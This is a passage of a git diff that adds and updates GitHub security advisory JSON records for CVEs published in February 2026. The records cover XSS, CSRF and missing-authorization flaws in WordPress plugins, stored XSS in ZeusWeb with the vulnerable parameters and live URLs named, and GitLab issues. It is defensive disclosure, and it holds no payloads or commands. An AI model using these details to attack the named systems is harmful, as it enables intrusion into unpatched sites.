"GHSA-mw6j-4x6g-77v3", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2025-9986" + ], + "details": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Vadi Corporate Information Systems Ltd. Co. DIGIKENT allows Excavation.This issue affects DIGIKENT: through 13092025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9986" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0056" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-497" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-prgq-3hfx-hfpx/GHSA-prgq-3hfx-hfpx.json b/advisories/unreviewed/2026/02/GHSA-prgq-3hfx-hfpx/GHSA-prgq-3hfx-hfpx.json new file mode 100644 index 0000000000000..a410ab55a2d4b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-prgq-3hfx-hfpx/GHSA-prgq-3hfx-hfpx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-prgq-3hfx-hfpx", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1833" + ], + "details": "The WaMate Confirm – Order Confirmation plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 2.0.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to block and unblock phone numbers, which should be restricted to administrators.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1833" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wamate-confirm/tags/2.0.1/customnotification.php#L1579" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wamate-confirm/tags/2.0.1/customnotification.php#L1596" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wamate-confirm/trunk/customnotification.php#L1579" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wamate-confirm/trunk/customnotification.php#L1596" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f9566fdd-c4ad-4971-b23b-bcf76c8b5cef?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r47q-hvhr-7cx6/GHSA-r47q-hvhr-7cx6.json b/advisories/unreviewed/2026/02/GHSA-r47q-hvhr-7cx6/GHSA-r47q-hvhr-7cx6.json new file mode 100644 index 0000000000000..d9b9bf7e0a916 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r47q-hvhr-7cx6/GHSA-r47q-hvhr-7cx6.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r47q-hvhr-7cx6", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1215" + ], + "details": "The MMA Call Tracking plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3.15. This is due to missing nonce validation when saving plugin configuration on the `mma_call_tracking_menu` admin page. This makes it possible for unauthenticated attackers to modify call tracking configuration settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mma-call-tracking/tags/2.3.15/mma_call_tracking.php#L61" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mma-call-tracking/tags/2.3.15/mma_call_tracking.php#L967" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mma-call-tracking/trunk/mma_call_tracking.php#L61" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mma-call-tracking/trunk/mma_call_tracking.php#L967" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5689bd2b-1518-4b3b-81a3-cc92575f6c1f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vpqr-79qg-79p9/GHSA-vpqr-79qg-79p9.json b/advisories/unreviewed/2026/02/GHSA-vpqr-79qg-79p9/GHSA-vpqr-79qg-79p9.json new file mode 100644 index 0000000000000..75e2d755b8aa7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vpqr-79qg-79p9/GHSA-vpqr-79qg-79p9.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vpqr-79qg-79p9", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2025-13650" + ], + "details": "An attacker with access to the web application ZeusWeb of the provider Microcom (in this case, registration is not necessary, but the action must be performed) who has the vulnerable software could introduce arbitrary JavaScript by injecting an XSS payload into the ‘Surname’ parameter of the ‘Create Account’ operation at the URL:  https://zeus.microcom.es:4040/index.html?zeus6=true . This issue affects ZeusWeb: 6.1.31.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13650" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-CVE-2025-13650" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-HRTU-0001" + }, + { + "type": "WEB", + "url": "https://www.microcom360.com/servicio-zeus-web" + }, + { + "type": "WEB", + "url": "https://zeus.microcom.es:4040" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vw5r-3jjm-rpxq/GHSA-vw5r-3jjm-rpxq.json b/advisories/unreviewed/2026/02/GHSA-vw5r-3jjm-rpxq/GHSA-vw5r-3jjm-rpxq.json new file mode 100644 index 0000000000000..1e4eeaa8b45ee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vw5r-3jjm-rpxq/GHSA-vw5r-3jjm-rpxq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vw5r-3jjm-rpxq", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-0724" + ], + "details": "The WPlyr Media Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_wplyr_accent_color' parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0724" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wplyr-media-block/tags/1.3.0/includes/class-wplyr.php#L359" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wplyr-media-block/tags/1.3.0/includes/class-wplyr.php#L434" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wplyr-media-block/trunk/includes/class-wplyr.php#L359" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wplyr-media-block/trunk/includes/class-wplyr.php#L434" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7a4cc65b-b0a7-4002-add4-ceacfe2f54f1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w569-6xv3-222m/GHSA-w569-6xv3-222m.json b/advisories/unreviewed/2026/02/GHSA-w569-6xv3-222m/GHSA-w569-6xv3-222m.json new file mode 100644 index 0000000000000..afff057551205 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w569-6xv3-222m/GHSA-w569-6xv3-222m.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w569-6xv3-222m", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1804" + ], + "details": "The WDES Responsive Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wdes-popup-title' shortcode in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1804" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wdes-responsive-popup/tags/1.3.6/lib/view/title.php#L77" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wdes-responsive-popup/tags/1.3.6/wdes-popup.php#L111" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3afdffa7-23ec-41ea-b05a-152a69b7ce50?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w6xg-jvhg-4qqw/GHSA-w6xg-jvhg-4qqw.json b/advisories/unreviewed/2026/02/GHSA-w6xg-jvhg-4qqw/GHSA-w6xg-jvhg-4qqw.json new file mode 100644 index 0000000000000..2f16f3011c2b9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w6xg-jvhg-4qqw/GHSA-w6xg-jvhg-4qqw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6xg-jvhg-4qqw", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-0815" + ], + "details": "The Category Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag-image' parameter in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0815" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/category-image/tags/2.0/category-image.php#L28" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/category-image/trunk/category-image.php#L28" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fb28c526-67ae-441d-9964-5ac17b966687?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w848-8gfw-8jhq/GHSA-w848-8gfw-8jhq.json b/advisories/unreviewed/2026/02/GHSA-w848-8gfw-8jhq/GHSA-w848-8gfw-8jhq.json new file mode 100644 index 0000000000000..12ceaf8fccd4f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w848-8gfw-8jhq/GHSA-w848-8gfw-8jhq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w848-8gfw-8jhq", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1748" + ], + "details": "The Invoct – PDF Invoices & Billing for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple functions in all versions up to, and including, 1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve invoice clients, invoice items, and list of WordPress users along with their emails.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1748" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kirilkirkov-pdf-invoice-manager/tags/1.6/KirilKirkovWpInvoices.php#L565" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kirilkirkov-pdf-invoice-manager/tags/1.6/KirilKirkovWpInvoices.php#L585" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kirilkirkov-pdf-invoice-manager/tags/1.6/KirilKirkovWpInvoices.php#L605" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kirilkirkov-pdf-invoice-manager/tags/1.6/KirilKirkovWpInvoices.php#L626" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/79e4b7e1-9fff-4ff2-be2b-6dfa5f1ff48a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wvch-mq77-2vf3/GHSA-wvch-mq77-2vf3.json b/advisories/unreviewed/2026/02/GHSA-wvch-mq77-2vf3/GHSA-wvch-mq77-2vf3.json new file mode 100644 index 0000000000000..72368fc76c3b9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvch-mq77-2vf3/GHSA-wvch-mq77-2vf3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvch-mq77-2vf3", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2025-13648" + ], + "details": "An attacker with access to the web application ZeusWeb of the provider Microcom\n\n (in this case, registration is required) who has the vulnerable software could introduce arbitrary JavaScript by injecting an XSS payload into the ‘Name’ and “Surname” parameters within the ‘My Account’ section at the URL: https://zeus.microcom.es:4040/administracion-estaciones.html  resulting in a stored XSS.\nThis issue affects ZeusWeb: 6.1.31.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13648" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-CVE-2025-13648" + }, + { + "type": "WEB", + "url": "https://www.hackrtu.com/blog/CNA-HRTU-0001" + }, + { + "type": "WEB", + "url": "https://www.microcom360.com/servicio-zeus-web" + }, + { + "type": "WEB", + "url": "https://zeus.microcom.es:4040" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json b/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json index 1fe637d52d188..8b09e8c0cad7c 100644 --- a/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json +++ b/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x566-frf2-p8rw", - "modified": "2026-02-09T12:30:22Z", + "modified": "2026-02-11T09:30:17Z", "published": "2026-02-09T12:30:22Z", "aliases": [ "CVE-2025-6830" From d18df75907a1d490f87f3d9a6f9382bd6bb08d59 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 12:32:27 +0000 Subject: [PATCH 003/215] Publish Advisories GHSA-8x3f-4jvw-ww73 GHSA-3c27-7487-m6fw GHSA-68cw-mrhh-x9wc GHSA-6j8r-j98h-9g9f GHSA-7p7x-r7pv-gq7p GHSA-7x5p-82gv-c93r GHSA-83gj-2vrh-jvx9 GHSA-8f2f-6w9m-mg42 GHSA-95p8-ccjw-3g7f GHSA-9fx3-39vw-q4x9 GHSA-cf2v-m456-7qjf GHSA-gvr9-jwjx-g2pq GHSA-hfx3-365h-vfrv GHSA-m668-xfwp-34x6 GHSA-mqfv-j8mc-8hp5 GHSA-p7j7-2wwv-p5hw GHSA-w487-9r9p-6p96 GHSA-x35m-4mv2-6m4p GHSA-x398-2rgf-67p8 GHSA-x566-frf2-p8rw GHSA-xfh9-f34g-8fm7 --- .../GHSA-8x3f-4jvw-ww73.json | 10 ++++- .../GHSA-3c27-7487-m6fw.json | 44 +++++++++++++++++++ .../GHSA-68cw-mrhh-x9wc.json | 44 +++++++++++++++++++ .../GHSA-6j8r-j98h-9g9f.json | 10 ++++- .../GHSA-7p7x-r7pv-gq7p.json | 44 +++++++++++++++++++ .../GHSA-7x5p-82gv-c93r.json | 44 +++++++++++++++++++ .../GHSA-83gj-2vrh-jvx9.json | 36 +++++++++++++++ .../GHSA-8f2f-6w9m-mg42.json | 44 +++++++++++++++++++ .../GHSA-95p8-ccjw-3g7f.json | 44 +++++++++++++++++++ .../GHSA-9fx3-39vw-q4x9.json | 44 +++++++++++++++++++ .../GHSA-cf2v-m456-7qjf.json | 44 +++++++++++++++++++ .../GHSA-gvr9-jwjx-g2pq.json | 44 +++++++++++++++++++ .../GHSA-hfx3-365h-vfrv.json | 44 +++++++++++++++++++ .../GHSA-m668-xfwp-34x6.json | 44 +++++++++++++++++++ .../GHSA-mqfv-j8mc-8hp5.json | 44 +++++++++++++++++++ .../GHSA-p7j7-2wwv-p5hw.json | 44 +++++++++++++++++++ .../GHSA-w487-9r9p-6p96.json | 44 +++++++++++++++++++ .../GHSA-x35m-4mv2-6m4p.json | 40 +++++++++++++++++ .../GHSA-x398-2rgf-67p8.json | 44 +++++++++++++++++++ .../GHSA-x566-frf2-p8rw.json | 2 +- .../GHSA-xfh9-f34g-8fm7.json | 44 +++++++++++++++++++ 21 files changed, 799 insertions(+), 3 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-3c27-7487-m6fw/GHSA-3c27-7487-m6fw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-68cw-mrhh-x9wc/GHSA-68cw-mrhh-x9wc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7p7x-r7pv-gq7p/GHSA-7p7x-r7pv-gq7p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7x5p-82gv-c93r/GHSA-7x5p-82gv-c93r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-83gj-2vrh-jvx9/GHSA-83gj-2vrh-jvx9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8f2f-6w9m-mg42/GHSA-8f2f-6w9m-mg42.json create mode 100644 advisories/unreviewed/2026/02/GHSA-95p8-ccjw-3g7f/GHSA-95p8-ccjw-3g7f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9fx3-39vw-q4x9/GHSA-9fx3-39vw-q4x9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cf2v-m456-7qjf/GHSA-cf2v-m456-7qjf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gvr9-jwjx-g2pq/GHSA-gvr9-jwjx-g2pq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hfx3-365h-vfrv/GHSA-hfx3-365h-vfrv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m668-xfwp-34x6/GHSA-m668-xfwp-34x6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mqfv-j8mc-8hp5/GHSA-mqfv-j8mc-8hp5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p7j7-2wwv-p5hw/GHSA-p7j7-2wwv-p5hw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w487-9r9p-6p96/GHSA-w487-9r9p-6p96.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x35m-4mv2-6m4p/GHSA-x35m-4mv2-6m4p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x398-2rgf-67p8/GHSA-x398-2rgf-67p8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xfh9-f34g-8fm7/GHSA-xfh9-f34g-8fm7.json diff --git a/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json b/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json index 808e29db5f926..c60a2fec17678 100644 --- a/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json +++ b/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8x3f-4jvw-ww73", - "modified": "2026-02-11T09:30:17Z", + "modified": "2026-02-11T12:30:21Z", "published": "2026-01-08T15:31:25Z", "aliases": [ "CVE-2026-0719" @@ -31,6 +31,14 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2026-0719" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2529" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2528" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2514" diff --git a/advisories/unreviewed/2026/02/GHSA-3c27-7487-m6fw/GHSA-3c27-7487-m6fw.json b/advisories/unreviewed/2026/02/GHSA-3c27-7487-m6fw/GHSA-3c27-7487-m6fw.json new file mode 100644 index 0000000000000..0aa0d54ad5081 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3c27-7487-m6fw/GHSA-3c27-7487-m6fw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3c27-7487-m6fw", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2025-14594" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.11 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an authenticated user to view certain pipeline values by querying the API.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14594" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3457591" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/583967" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-68cw-mrhh-x9wc/GHSA-68cw-mrhh-x9wc.json b/advisories/unreviewed/2026/02/GHSA-68cw-mrhh-x9wc/GHSA-68cw-mrhh-x9wc.json new file mode 100644 index 0000000000000..91c2394beab0d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-68cw-mrhh-x9wc/GHSA-68cw-mrhh-x9wc.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-68cw-mrhh-x9wc", + "modified": "2026-02-11T12:30:21Z", + "published": "2026-02-11T12:30:21Z", + "aliases": [ + "CVE-2026-2295" + ], + "details": "The WPZOOM Addons for Elementor – Starter Templates & Widgets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'ajax_post_grid_load_more' function in all versions up to, and including, 1.3.2. This makes it possible for unauthenticated attackers to retrieve protected (draft, future, pending) post titles and excerpts that should not be accessible to unauthenticated users.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2295" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpzoom-elementor-addons/tags/1.3.1/includes/wpzoom-elementor-ajax-posts-grid.php#L66" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3458416/wpzoom-elementor-addons" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b9961347-7c47-4fa1-af35-609c39a6cd8b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T10:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json b/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json index 48ffd8648737c..8c9233ed50a49 100644 --- a/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json +++ b/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6j8r-j98h-9g9f", - "modified": "2026-02-11T09:30:17Z", + "modified": "2026-02-11T12:30:21Z", "published": "2026-02-02T15:30:34Z", "aliases": [ "CVE-2026-1761" @@ -27,6 +27,14 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2026-1761" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2529" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2528" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2514" diff --git a/advisories/unreviewed/2026/02/GHSA-7p7x-r7pv-gq7p/GHSA-7p7x-r7pv-gq7p.json b/advisories/unreviewed/2026/02/GHSA-7p7x-r7pv-gq7p/GHSA-7p7x-r7pv-gq7p.json new file mode 100644 index 0000000000000..2c33d0904a091 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7p7x-r7pv-gq7p/GHSA-7p7x-r7pv-gq7p.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p7x-r7pv-gq7p", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2025-7659" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that could have allowed an unauthenticated user to steal tokens and access private repositories by abusing incomplete validation in the Web IDE.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7659" + }, + { + "type": "WEB", + "url": 